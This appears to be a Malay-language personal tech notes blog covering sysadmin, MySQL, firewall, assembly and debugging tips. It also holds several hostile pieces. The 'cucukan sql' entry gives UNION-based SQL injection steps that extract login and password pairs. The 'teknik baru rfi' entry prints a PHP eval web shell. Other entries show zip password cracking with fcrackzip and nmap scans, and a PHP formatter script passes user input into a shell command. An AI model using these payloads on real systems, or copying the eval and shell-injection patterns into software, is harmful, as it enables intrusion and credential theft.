masalah mysql inet_ntoa

certain version mysql(5.1.41), hasil inet_ntoa tak dipapar dalam format string, sebaliknya sebagai integer.
Data(the bits itself) betul, tapi sebab di print/display as number, membuatkan pengguna keliru.

Penyelesaian:
guna 'CAST ... AS CHAR' seperti di bawah.

SELECT CAST( INET_NTOA( 1965180531 ) AS CHAR)

transparensi dlm gimp

cara nak transparentkan sebahagian dari gambar.
1)create new layer. 'Layer Fill Type' => Transparency
2) salin gambar ke layer baru.
3) Guna Eraser Tool. dan select kawasan yg nak ditransparensi kan

boot linux dapat grub je

dari grub prompt, larikan arahan di bawah:
set root=(hd0,1)
linux /boot/vmlinux-2.6.38-8-generic root=/dev/sda1 ro
initrd /boot/initrd.img-2.6.38-8-generic
boot

kemudian boot. Lepas boot:

sudo grub-install /dev/sda
sudo update-grub

iptable

agak kompleks banding dengan pf(bsd).

1) secara default(table filter) rantaian(flow) paket seperti rajah dibawah.

2) arahan
iptables -F   ;# flush semua
iptables -P INPUT DROP -t filter   ;# default policy INPUT adalah DROP dlm tbl filter
iptables -L -t filter ;# list rules dalam table filter
iptables -t filter -A INPUT -s 192.168.117.57/32 -i eth0 -j ACCEPT ;# add dlm chain INPUT tbl filter

iptables-save  > rules.txt ;# boleh pipe ke file (utk restore )
iptables-restore < rules.txt


contoh:

#!/bin/sh

iptables -F INPUT 

iptables -F OUTPUT

iptables -F FORWARD

iptables -P INPUT DROP

iptables -P OUTPUT DROP

iptables -P FORWARD DROP

#Permit DNS traffic

iptables -A INPUT -p udp --sport 53 -j ACCEPT

iptables -A OUTPUT -p udp --sport 53 -j ACCEPT

#Accept local-network return traffic for clients

iptables -A INPUT -m state -p tcp --dport 1024:65535 --state ESTABLISHED,RELATED -s 192.168.9.0/24 -j ACCEPT

iptables -A OUTPUT -m state -p tcp --dport 1024:65535 ! --state INVALID -d 192.168.9.0/24 -j ACCEPT

#Accept local (192.168.9.0/24) SSH traffics

iptables -A INPUT -m state -p tcp --dport 22 ! --state INVALID -s 192.168.9.0/24 -j ACCEPT

iptables -A OUTPUT -m state -p tcp --sport 22 --state ESTABLISHED,RELATED -d 192.168.9.0/24 -j ACCEPT

Cara baca rules berbeza dengan pf,  bila dah match rules pada line tertentu, tak baca lagi rules yg kat bawah. Sama macam 'quick' dalam pf.

3) nat
   iptables -t nat -A POSTROUTING -o <external-interface> -j MASQUERADE

4) port forwarding
   iptables -t nat -A PREROUTING -p tcp -i <external-interface> --dport <port-num> -j DNAT --to <int_ip>:<port>
contoh 1:
   iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 8080 -j DNAT --to 192.168.9.35:22
contoh 2:
   iptables -t nat -A PREROUTING -i eth0 -j DNAT -d 202.1.1.4 --to 192.168.1.1
  # any packet to 202.1.1.4 will be forward to 192.168.1.1 tanpa disedari(transparent)


5) iptables ada 3 tables

1. filter: ada 3 chain
1. FORWARD
2. INPUT
3. OUTPUT
2. nat: ada 3 chain
1. PREROUTING
2. POSTROUTING
3. OUTPUT
3. mangle (jarang guna, boleh abaikan je)
1. PREROUTING
2. POSTROUTING
3. OUTPUT
4. INPUT
5. FORWARD

Rujuk rajah utk lebih detail

ref: http://www.linuxhomenetworking.com/wiki/index.php/Quick_HOWTO_:_Ch14_:_Linux_Firewalls_Using_iptables

call (assembly)

call dalam asemby setara kepada 2 operasi seperti berikut:

call 0x00401000   => push EIP
                               mov EIP, 0x00401000

pf firewall

PF(firewall pada openbsd)

pf akan baca semua rules bermula dari atas ke bawah. Rules yg di baca kemudian(di bawah) akan mengatasi(overwrite) rules yg awal.

contoh:

block in on em0
pass in on em0 from 10.0.1.0/24

keterangan:
mula dengan default block. Kemudian benarkan jika paket asal dari ip 10.0.1.0/24

block in on em0
block in quick on em0 from 10.0.1.34
pass in on em0 from 10.0.1.0/24

keterangan:
sebab ada 'quick' pada baris 2: Jika asal paket adalah 10.0.1.34, terus drop paket tu. tak perlu lagi semak rules yg kat bawah.




ref:http://openbsd.com/faq/pf/filter.html#pass

cucukan sql

1) nak tentukan bilangan field
order by 6-- >> masih kluar normal page
order by 7-- >> page dah tak normal

2) nak tahu field yang berkenaan
union select 1,2,3,4,5,6--   >> akan kluar '5'

3) nak dapat version
union select 1,2,3,4,version(),6--

4) dapatkan senarai table
union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=[databasename]

5) dapatkan senarai nama field
union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=[tablename]


6) dapatkan maklumat tertentu
union select 1,2,3,4,concat_ws(0x3a,login,password),6 from users
output>> login.password

windows route

route ADD 10.10.10.0 MASK 255.255.255.0 192.168.2.13

kekal walau reboot
route -p ADD 10.10.10.0 MASK 255.255.255.0 192.168.2.13

diff svn

diff -U 3 -H -d -r -N cronjob_lama/svn-commit.tmp cronjob/svn-commit.tmp

sambung download scp

kombinasi rsyn dan ssh:

rsync --rsh='ssh' -av --progress --partial 10.0.0.12:/home/siperdana/fileDownload.tar.gz /path/to/lokasi/

Kurangkan penggunaan harddisk oleh Thunderbird

Walaupun dah delete email, saiz dalam harrdisk masih tak berkurang. Perlu runkan File-> Compact_Folder.

Keterangan: Walau file dah delete, email tersebut masih belum di buang dalam file berkenaan, cuma di hidekan saja dari pengguna. Bila run compact_folder, thunderbird akan delete sebenar-benarnya dari fail yang berkenaan.

thunderbird 3.1

Teka OS dari jauh

nmap -O -v siperdana.blog.com

Device type: WAP
Running: Linux 2.4.X
OS details: DD-WRT v23 (Linux 2.4.36)
Uptime guess: 32.007 days (since Sun Jul 17 11:13:34 2011)
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros


nmap -sT -p0 siperdana.blog.com

Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-18 11:19 MYT
Nmap scan report for siperdana.com.my (74.51.218.240)
Host is up (0.28s latency).
rDNS record for 74.51.218.240: f0.76.344a.static.theplanet.com
Not shown: 967 closed ports
PORT     STATE    SERVICE
1/tcp    filtered tcpmux
3/tcp    filtered compressnet
4/tcp    filtered unknown
6/tcp    filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds

Network tools

netstat -punat

lsof -i :80   ; semak port

nmap -sT -p 1-65535 10.0.0.1;  test port 1 hingga 65535

scan subnet

nmap -v -sP 192.168.1.0/24 |grep -B1 up

enigmail utk thunderbird 3.1

link utk versi yg serasi dengan thunderbird 3.1
http://enigmail.mozdev.org/download/download-static.php.html

enigmail 1.2 hnaya sesuai utk thunderbird 5.0 ke atas

workstation 6.5.5 tak boleh compile atas kernel 2.6.38 (natty)

1) 

cd /usr/lib/vmware/modules/source
tar xf file berikut(vmci.tar, vmmon.tar, vmnet.tar, vsock.tar)
buat backup semua file .tar di atas.


2)
applykan patch berikut: http://communities.vmware.com/servlet/JiveServlet/download/1721070-60934/2.6.37.1-1.2_6.5.5.patch
compress balik kod yg dah dipatch dalam .tar masing-masing.


3)
run: vmware-modconfig --console --install-all




ref: 
http://communities.vmware.com/message/1721070#1721070

/etc/network/interfaces

Arahan Tambahan dalam interfaces

# The loopback network interface
auto lo
auto eth0
iface lo inet loopback
iface eth0 inet static
address 192.168.0.14
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
post-up iptables-restore < /etc/iptables.up.rules

auto eth1
iface eth1 inet static
address 10.0.1.190
netmask 255.255.255.0
broadcast 10.0.1.255
network 10.0.1.0
hwaddress ether 00:0c:29:13:db:26
up route add -net 10.0.110.0/24 gw 10.0.1.254
up route add -net 10.0.14.0/24 gw 10.0.1.254
up route add -net 22.30.3.0/24 gw 10.0.1.254

carian gmail

label:inbox label:unread after:2011/05/15 before:2011/06/29


>> cari dalam inbox, yg belum baca, tarikh antara 15 May - 29 Jun  2011

Samba

# smbclient -L 192.168.1.2 -U muridin
Enter muridin's password:

Domain=[BIOLOGY] OS=[Unix] Server=[Samba 2.2.2]

 Sharename      Type      Comment
 ---------      ----      -------
 public         Disk      Public Stuff
 classes        Disk      Course folders
 website        Disk      Biology Life Sciences website
 win2k          Disk      Windows 2000 installer
 off2k          Disk      Office 2000 installer
 msdata         Disk      Mass Spec Data
 IPC$           IPC       IPC Service (Squirrel Samba Server)
 ADMIN$         Disk      IPC Service (Squirrel Samba Server)
 gonzo          Printer   

#smbmount //10.0.0.1/sharename /mnt/localdir -o username=nama,rw

or 

sudo mount -t cifs //<vpsa_ip_address>/<export_share> /mnt/<local_share>

openbsd network

openvpn

• cd /etc/openvpn
• openvpn client.conf

firewall:

• pfctl -n -f /etc/pf.conf

network restart

• sh /etc/netstart em1    (atau)
• sh /etc/netstart

alias ip

• cat /etc/hostname.em1

defautl gw :   /etc/mygate

route

• route show
• route -n show
• route -n show -inet
• netstat -rn

route add:

• route add -net 192.168.1.0/24 192.168.1.254

ref:http://www.cyberciti.biz/faq/howto-setup-static-routes-on-openbsd-unix-networking/

crossover: takleh restore window word

[Manage Bottle]->[ControlPanel]->[WineConfiguration]->[LaunchedSelectedItems]->[Graphics]

Uncheck Below options:

Allow the window manager to decorate the windows
Allow the window manager to control the windows






ref:http://www.codeweavers.com/support/tickets/browse/?ticket_id=839647

joomla model

1- Joomla framework akan cipta kelas model yang sama nama dengan view, dan membolehkan kelas model tersebut digunakan dalam kelas view.

Dalam /com_sample/view/js/view.html.php

class SampleViewJs extend JView

Dalam /com_sample/models/js.php

class SampleModelJs extend JModel

2- nak call model dari dalam view

$model = &$this->getModel();
$greeting = $model->getGreeting();

esx auto start guest

php kod formatter

artikel sebelum ni di hasilkan menggunakan kod php berikut:


<?php

$str = $argv[1];

$str = ` cat $str;`;
highlight_string($str);
?>




joomla JController->execute()

Joomla JController->execute



<?phpclass kelas{
    function papar($var1 = "lk"){
        echo "kod dalam function papar";  
    }
    function execute($task){
        $this->$task();
    }
}
$objek = new kelas();$objek->execute("papar");
?>


prestasi mysql

tmp_table_size


http://www.mysqlperformanceblog.com/2007/08/16/how-much-overhead-is-caused-by-on-disk-temporary-tables/

tukar timezone ubuntu

dpkg-reconfigure tzdata


ref:http://webonrails.com/2009/07/15/change-timezone-of-ubuntu-machine-from-command-line/

php variable scope

1) global
<?php
$a = 1;
$b = 2;

function cuba(){
  global $a;
  echo "\$a = $a  \$b = $GLOBALS['b']";
}
?>

2) static
<?php
  function init(){
  static $a;
  $a++
}

svn propedit

ignoring file(s) in dir
svn propedit svn:ignore dir/

>> dalam mod vi, tukar senarai fail yg nak di abaikan. satu fail satu baris


ps/: kalau guna svn propset, akan overwrite senarai fail yg sebelum.

svn ignore dir

svn propset svn:ignore '*' unwanted_dir/

1)
webcapt/tmp$ svn status
M sessions
? sessions/ruby_sess.20649250e5a2ebfa
? sessions/ruby_sess.34a7003c82eaa928
? sessions/ruby_sess.f8c127b41f2b56ba
? sessions/ruby_sess.a75f05bc662a38ac

2)
webcapt/tmp$ svn propset svn:ignore '*' sessions/
property 'svn:ignore' set on 'sessions'

3)
webcapt/tmp$ svn status
M sessions

4)
webcapt/tmp$ svn commit
"svn-commit.tmp" 4L, 87C written
Sending tmp/sessions
Committed revision 19.

5)
webcapt/tmp$ svn status
[[[no more {? sessions/ruby_sess.34a7003c82eaa928} ]]]

UUID

1)
$ ls /dev/disk/by-uuid/ -alh
total 0
drwxr-xr-x 2 root root 100 2011-05-05 10:15 .
drwxr-xr-x 5 root root 100 2011-05-05 10:15 ..
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 185de63a-3239-494d-993d-25cac74231dd -> ../../sda2
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 1ca70448-5191-43de-b9e0-3ce9dfa14703 -> ../../sda3
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 4c63ea13-039b-4346-b726-0a0cf59ab86e -> ../../sdb1


2)
$sudo blkid
/dev/sda1: TYPE="swap"
/dev/sda2: UUID="185de63a-3239-494d-993d-25cac74231dd" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda3: UUID="1ca70448-5191-43de-b9e0-3ce9dfa14703" SEC_TYPE="ext2" TYPE="ext3"
/dev/sdb1: UUID="4c63ea13-039b-4346-b726-0a0cf59ab86e" TYPE="ext3"


ref: http://ubuntuforums.org/showthread.php?t=1026957

find dan rm

find ./ -mtime +100 -exec rm -r {} \;

cari dalam ./ file yang berumur lebih dari 100 hari, dan delete.
> +100 : 100 hari dan lebih
> -100 : kurang dari 100 hari
> 100 : exact 100 hari


lain-lain pilihan:
-amin, -atime, -cmin, -ctime, -mmin, and -mtime

c(ctime) > file's status
a > access
m > File's data modified

time > day(24 hours)
min > min


ref:http://www.linuxquestions.org/questions/linux-newbie-8/delete-files-older-than-30-days-using-cronjob-333477/

redmine, webdav - svn

bagaimana webdav semak permisi untuk baca svn


Fail: /usr/lib/perl5/Apache/Redmine.pm:

sub RedmineDSN {
my ($self, $parms, $arg) = @_;
$self->{RedmineDSN} = $arg;
my $query = "SELECT
hashed_password, auth_source_id, permissions
FROM members, projects, users, roles
WHERE
projects.id=members.project_id
AND users.id=members.user_id
AND roles.id=members.role_id
AND users.status=1
AND login=?
AND identifier=? ";
$self->{RedmineQuery} = trim($query);
}

ps:/kena add members dalam project

ref:http://www.redmine.org/projects/redmine/wiki/Repositories_access_control_with_apache_mod_dav_svn_and_mod_perl

NoMachine Fullscreen

CTRL+Alt+F  full screen


URL: http://www.nomachine.com/ar/view.php?ar_id=AR03C00172

inline assembly

mingW

#include <stdio.h>

get_sp(int *eip){

asm (

"mov %esp, %eax\n"

"mov 4(%ebp), %ebx\n" // ebx isi eip

"lea 8(%ebp), %ecx\n"

"mov (%ecx), %ecx\n"

"mov %ebx, (%ecx)\n"

);

}

void main(){

int x = 5;

asm( "int3");

printf ("StackPointer (ESP): 0x%x\n", get_sp(&x));

printf ("EIP: 0x%x\n", x);

}

cl (visual studio)

#include <stdio.h>

get_sp(int *eip){

__asm{ 

mov eax, esp

mov ebx, [ebp+4]

lea ecx,[ebp+8]

mov ecx, [ecx]

mov [ecx], ebx

}

}

void main(){

int x = 5;

__asm {int 3};

printf ("StackPointer (ESP): 0x%x\n", get_sp(&x));

printf ("EIP: 0x%x\n", x);

}

char array vs char pointer

char j2[100] = "adam:Aku darah anak malaysia";
char *j3;

j3 = j2 ;
printf("&j2=%p j2=%p\n",&j2, j2);
printf("&j3=%p  j3=%x\n", &j3, j3);

>>:

&j2=0x7fff1b810fc0 j2=0x7fff1b810fc0
&j3=0x7fff1b810fb8  j3=1b810fc0



#di compile dan run atas 64bit OS.
&j2 sama dgn j2 dan j3.
&j3 adalah lokasi dimana alamat j2 disimpan.

string.h (c)

1) strcmp
bil = strcmp(char *strA, char *strB);
if (bil == 0){
>> strA = strB
}



2) strstr
char *s1 = "amanamanam";
char *s2 = "ana";
char *s3;

s3 = strstr(s1, s2);
printf("%p - %p = %f\n",s3, s1, (double)(s3 - s1));
>>>>0x40085e - 0x40085c = 2.000000

bit, byte, word

1nible = 4 bit
1byte = 8 bit
1word = 2 byte = 16 bit
1dword = 4byte = 32 bit


ps:/ setiap alamat dalam memory boleh isi 8 bit

retn

retn >> pop eip

retn 10 >> pop eip,
           >> add esp,10h

Contoh:
1-Mula seperti dibawah.

Sebelum RETN 14 (alamat 76E0BFA9), ESP = 001BFA18. 
RET 14 >>
- POP EIP
- ADD ESP 14

2- Hasilnya, perubahan berlaku pada EIP dan ESP.

- POP EIP akan menyebabkan ESP bertukar kepada 001BFA1C. 

- SUB ESP, 14 >>  ESP = 001BFA1C + 14 = 001BFA30

seperti dibawah:

jump if overflow

assembly:
jo > jump if overflow

Tapi ni bukan stack overflow. Dia rujuk kepada flag overflow(O) kat CPU.
Flag ni aktif kalau hasil kira2 terakhir, nilainya terlalu besar utk simpan dalam register.


[false alarm.]

mysql create user

GRANT ALL PRIVILEGES ON `dbName`.* TO 'mysqluser'@'localhost' WITH GRANT OPTION ;



Detail:
CREATE USER 'new-username'@'localhost' IDENTIFIED BY 'new-password';
GRANT ALL ON *.* TO 'new-username'@'localhost' WITH GRANT OPTION;

There is a list of privileges that you can grant to a user:

Privilege	Meaning
ALL [PRIVILEGES]	Sets all simple privileges except GRANT OPTION
ALTER	Enables use of ALTER TABLE
CREATE	Enables use of CREATE TABLE
CREATE TEMPORARY TABLES	Enables use of CREATE TEMPORARY TABLE
DELETE	Enables use of DELETE
DROP	Enables use of DROP TABLE
EXECUTE	Not implemented
FILE	Enables use of SELECT … INTO OUTFILE and LOAD DATA INFILE
INDEX	Enables use of CREATE INDEX and DROP INDEX
INSERT	Enables use of INSERT
LOCK TABLES	Enables use of LOCK TABLES on tables for which you have the SELECT privilege
PROCESS	Enables the user to see all processes with SHOW PROCESSLIST
REFERENCES	Not implemented
RELOAD	Enables use of FLUSH
REPLICATION CLIENT	Enables the user to ask where slave or master servers are
REPLICATION SLAVE	Needed for replication slaves (to read binary log events from the master)
SELECT	Enables use of SELECT
SHOW DATABASES	SHOW DATABASES shows all databases
SHUTDOWN	Enables use of MySQLadmin shutdown
SUPER	Enables use of CHANGE MASTER, KILL, PURGE MASTER LOGS, and SET GLOBAL statements, the MySQLadmin debug command; allows you to connect (once) even if max_connections is reached
UPDATE	Enables use of UPDATE
USAGE	Synonym for “no privileges”
GRANT OPTION	Enables privileges to be granted

ref: http://stuntsnippets.com/mysql-create-new-user/

pyHook

Cara nak guna pyHook dalam Immunity Debugger

1- Simpan kod di bawah dalam dir ~pathToImmunityDebugger\PyCommands\mhcubaHook.py

mhcubaHook.py

• line 17-18: nama hook mesti berlainan.

2- Buka Immunity Debugger dan File->Open sebarang fail exe.

3- Taip !mhcubaHook  dan [enter] dalam command box(pada bahagian bawah I.D. Akan dapati warna latar pada alamat 00401012 bertukar warna pink. Ini kerana arahan 'myhook.add(alamat)' .

4- Tekan butang F9(atau Debug->Run)

5- Klik menu Window-Log utk lihat hasilnya

recover delete file

sudo dd if=/dev/mmcblk0p1 of=myCard.img bs=512

photorec myCard.img

ref: http://goinggnu.wordpress.com/2008/02/14/recover-deleted-files-from-memory-card/

select into outfile

SELECT * INTO OUTFILE "/backup/books/allbooks.txt"
FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'
FROM books;

ref:
http://www.mysqlfaqs.net/mysql-faqs/Data-Back-Up/Export-Data/How-to-use-SELECT-INTO-OUTFILE-statement-to-export-data

mysqldump tanpa lock tables

mysqldump --lock-tables=false  -h komar.asia -u nama -ppassword database  > namaTable.sql

save mms stream

http://forum.videohelp.com/threads/257045-How-to-record-streaming-WMV-ASF-MMS-links-using-VLC-Media-Player

reset joomla 1.6 admin password

ganti field password kepada:

 d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199

seterusnya, login guna password secret.

masalah codec libraray

tiba-tiba media player(vlc) tak support byk format. avidemux pun sama, format yg di suppoprt menjadi kurang.

kat bawah ni cara nak selesaikan masalah.

---------------------------------------
I just solved my vlc video problems. It appears that the culprit was the getdeb repository that I had recently added. I commented out that repo and downgraded several packages - libavcodec-extra-52, libavdevice-extra-52 etc. The most important one seems to be libva1.

In case anyone needs detailed version information for some packages, I will be happy to post.


----------------------------
Open synaptic, search ffmpeg, and remove all installed ffmpeg libraires, starting with libavcodec* down to libswscale*

You'll lose some players and a plugin or 2, no matter, they can be reinstalled. (in synaptic, file -> history will show you

Then install some players and libxine1-ffmpeg and see.


ref:http://ubuntuforums.org/archive/index.php/t-1544929.html

pfctl bsd

susah betul nak ingat BSD ni.

pfctl -n -f /etc/pf.conf

cmp, jl, jg

cmp eax,5
bermaksud: eax - 5


mv eax, 4
cmp eax, 5
; > je -> tak
; > jl -> ya
; > jg -> tak

mv eax, 4
cmp eax, 4
; > je -> ya
; > jl -> tak
; > jg -> tak

mv eax, 4
cmp eax, 3
; > je -> tak
; > jl -> tak
; > jg -> ya


Flag Register
Bit 6: Zero -->> kalau cmp 5,5 -->> Z flag = 1
Bit 7: Sign -->> negatif sign, kalau cmp 1,2 -->>flag = 1

print poster atas kertas a4

ubuntu$ pdfposter -s 1  asal.pdf baru.pdf

asal.pdf adalah fail yg bersaiz besar, cuma satu muka surat.
baru.pdf fail saiz a4, tapi banyak muka surat.

print baru.pdf dan sambungkan kertas a4 menjadi poster yg besar

mencari ROP(return-oriented programming)

1- berhenti bila jumpa 'retn'
2- kalau 20 nilai teratas pada stack menunjuk kepada executable area dalam memori, besar kemungkinan ada ROP attempt.

teknik baru rfi

 

<?php
	if(isset($_REQUEST["code_str"])){
	eval(stripslashes($_REQUEST["code_str"]));
	} else {
	exit(999 * 4 . " The Roof Is On Fire");
	}
	?>

pin what???

rasanya pin(http://www.pintool.org/) ni boleh ganti hooking.

Contoh penggunaan adalah utk log kan setiap arahan opcode yg process jalankan.

Satu lagi alternatif ialah DynamoRIO(http://groups.csail.mit.edu/cag/dynamorio/)


ref: http://blog.zynamics.com/2010/07/28/dumping-shellcode-with-pin/

tebuk fail zip guna fcrackzip

$ zip --encrypt -r secret secret/
(creating secret.zip)


$ fcrackzip -u -c a -p aaaaa secret.zip
PASSWORD FOUND!!!!: pw == linux






ref http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

setiap alamat ada 8 bit

setiap alamat dalam memori boleh isi 8 bit.

eg:
alamat            nilai(dlm hexadecimal)
---------------   -------------
0x00102000: 41 44
0x00102001: 41 20
0x00102002: 42 41  43 41
0x00102004: 00

• [1- for dummies: kenapa 0x00102003 tiada kat atas?]
• [2- kalau char * str = 0x102000, printf("%s", str) dapat apa? ]

4 bit  boleh simpan 16 nilai berbeza
dlm hexadecimal    0x0 - 0xF

8 bit(1 byte) >> 0x00 - 0xFF

cmp (opcode)

cmp eax, ebx
>>

eax - ebx = y

kalau y == 0, ZF = 1 (True)
kalau y !=0,  ZF = 0 (False)

Assembly Leave Retn

LEAVE =>  POP EBP

RETN =>  POP EIP

VirtualProtect

Dalam Immunity Debugger-> Memory Map

Asal
Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE

Call Virtual Protect API

0040F253  |. 50             PUSH EAX                                          ; /pOldProtect

0040F254  |. 6A 40          PUSH 40                                           ; |NewProtect = PAGE_EXECUTE_READWRITE

0040F256  |. 52             PUSH EDX                                          ; |Size

0040F257  |. 68 00104000    PUSH setup279.00401000                            ; |Address = setup279.00401000

0040F25C  |. E8 1F000000    CALL <JMP.&kernel32.VirtualProtect>               ; \VirtualProtect

 Result

Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=RWE CopyOnWr
 Initial access=RWE

Perubahan pada field Access, dari [R E]  kepada [RWE CopyOnWr]

Bismillah

Dimulakan dengan nama Allah yang Maha Pemurah dan Maha Mengasihani.
Serta selawat dan salam untuk nabi Muhammad(SAW)